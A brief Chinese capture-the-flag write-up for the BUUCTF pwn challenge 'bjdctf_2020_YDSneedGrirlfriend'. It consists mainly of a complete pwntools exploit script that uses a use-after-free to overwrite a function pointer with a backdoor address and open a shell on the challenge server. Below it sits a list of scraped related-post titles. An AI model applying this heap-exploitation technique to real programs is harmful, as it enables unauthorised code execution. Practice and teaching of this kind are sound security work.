BUUCTF (pwn) bjdctf_2020_YDSneedGrirlfriend(UAF)
这道题知识点,题型与 actf_2019_babyheap这道题很相似,就不写那么详细了,又不了解的可以去看看
菜单
后门
EXP
from pwn import *p=remote('node3.buuoj.cn',29716)#p=process('./bjdctf_2020_YDSneedGrirlfriend')elf=ELF('./bjdctf_2020_YDSneedGrirlfriend')def add(size,name):p.sendlineafter("Your choice :",'1')p.sendlineafter("Her name size is :",str(size))p.sendlineafter("Her name is :",name)def dele(index):p.sendlineafter("Your choice :",'2')p.sendlineafter("Index :",str(index))def show(index):p.sendlineafter("Your choice :",'3')p.sendlineafter("Index :",str(index))backdoor=0x400b9cadd(0x20,'aaaa')add(0x20,'bbbb')dele(0)dele(1)add(0x10,p64(backdoor))show(0)p.interactive()
BUUCTF (pwn) bjdctf_2020_YDSneedGrirlfriend(UAF)相关推荐
- [BUUCTF]PWN——mrctf2020_shellcode_revenge(可见字符shellcode)
mrctf2020_shellcode_revenge 例行检查,64位程序,开启了RELRO和PIE 本地运行看一下大概的情况 64位ida载入,没法f5,直接看汇编 jg大于则跳转,jl小于则跳转 ...
- 乱七八糟的pwn入门(六)——5.passcode
审题 首先看题目: 连上服务器,看一下这次的代码: #include <stdio.h> #include <stdlib.h>void login(){int passcod ...
- BUUCTF——rsa系列(4)
目录 [BJDCTF2020]easyrsa [NCTF2019]babyRSA [AFCTF2018]可怜的RSA [RoarCTF2019]babyRSA [RoarCTF2019]RSA RSA ...
- BUUCTF misc 专题(83)从娃娃抓起
下载附件,先看题目提示 题目描述:伟人的一句话,标志着一个时代的开始.那句熟悉的话,改变了许多人的一生,为中国三十年来计算机产业发展铺垫了道路.两种不同的汉字编码分别代表了汉字信息化道路上的两座伟大里 ...
- buuctf pwn wp(第四波)格式化字符串漏洞系列
这里是一个总的分类,一个类型的第一道题目会详细介绍,后面的类型相同的会简略介绍(不过这是第一波,都是最简单的,原理可以看我前面的文章,后面难一点的题目我再讲原理.) 这一波题都是无脑AAAA的类型,它 ...
- BUUCTF(pwn)inndy_echo(32位格式化字符串修改got表)
这道题为我们提供了 system, 和 循环 过程, 为我们简化了很多步骤 from pwn import* p=remote('node3.buuoj.cn',25331) elf=ELF('./e ...
- [BUUCTF]PWN——judgement_mna_2016(32位fmt)
judgement_mna_2016 例行检查,32位程序,开启了canary和nx 运行一下,看看大概的情况 32位ida载入 明显的格式化字符串漏洞,动调看一下输入点的位置,找一下flag在栈上的 ...
- BUUCTF——rsa系列(2)
目录 目录 Dangerous RSA [HDCTF2019]basic rsa [GUET-CTF2019]BabyRSA rsa2 RSA5 [NCTF2019]childRSA [HDCTF20 ...
- BUUCTF misc 专题(72)喵喵喵
下载附件解压,是一张猫的图片 拖入到winhex中,并没有什么发现,放入stegsolve 在这里发现了png格式的照片,保存下来,发现打不开,拖入winhex 看到了头部有问题,以png为头,新建一 ...
最新文章
- 漫话:如何给女朋友解释什么是Git和GitHub?
- python软件包自带的集成开发环境-Python: 内置的集成开发环境-IDLE
- python监听多个udp端口_Python的Socket编程过程中实现UDP端口复用的实例分享
- (原创)对某国的一次渗透
- matlab与maple互联,Matlab,Maple和Mathematica三款主流科学计算软件的互操作
- spark学习-scala版写的SparkSQL程序读取Hbase表注册成表SQL查询
- SQL语句汇总(一)——数据库与表的操作以及创建约束
- Python 检测系统时间,k8s版本,redis集群,etcd,mysql,ceph,kafka
- Spark2.2(三十九):如何根据appName监控spark任务,当任务不存在则启动(任务存在当超过多久没有活动状态则kill,等待下次启动)...
- 基于皮尔森相关系数的协同过滤算法
- uchome登陆机制分析(三)
- 微信小程序、前端:背景图片样式拉伸不变形
- SC0084 AT32F407/437在UCOSIII上运行LwIP协议栈
- JAVA JNI中int和Integer完全不同
- 逐条讲解python_名校教授推荐:Python458集大型视频,从正确的方向出发学习
- Django 项目编码问题1UnicodeDecodeError: 'utf-8' codec can't decode byte 0xd2 in position 0: invalid contin
- 明明安装了模块/包,Python提示无包/模块/报错
- 用计算机知道函数值求度数,怎么计算出余弦的度数
- SVG - 在Android中使用矢量图全攻略
- 光纤收发器常见故障问题的时候我们该如何解决呢